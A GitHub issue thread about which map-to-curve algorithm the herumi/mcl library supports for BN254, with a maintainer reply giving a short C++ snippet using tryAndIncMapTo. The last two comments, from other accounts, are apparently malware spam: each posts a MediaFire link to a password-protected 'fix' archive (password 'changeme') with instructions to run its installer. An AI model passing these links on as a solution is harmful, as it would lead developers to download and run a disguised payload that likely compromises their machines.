### ISSUE TITLE
Which MaptoCurve used for BN254

### ISSUE THREAD

**Issue by nelsonijih** [herumi/mcl#211]
We're planning to use Dirk KMS(which uses this crypto library) for Operator remote BLS signing for BN254 curve.

What is the map to curve algorithm this library support for BN254?

Currently, some AVSs are using the "try and increment" algorithm for mapping to curve as described/written in the code link below 
https://github.com/Layr-Labs/eigensdk-go/blob/dev/crypto/bn254/utils.go#L36

If the library does not support it, any guidance on how to quickly add it? if it supports it, how do we enable it?

**Comment by herumi** [comment]
You can use [`mcl::ec::tryAndIncMapTo`](https://github.com/herumi/mcl/blob/master/include/mcl/ec.hpp#L948).
I don't know the specification of `SetBytes` in the original code; I expect that `setBigEndianMod` corresponds to it.

```cpp
using namespace mcl;
using namespace mcl::bn;
Fp t;
t.setBigEndianMod(digest);
G1 P;
mcl::ec::tryAndIncMapTo(P, t);
```
But the sign of `P.y` is not fixed either. `Fp::neg(P.y, P.y)` would be needed to match the `ModSqrt` specification in the original code.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
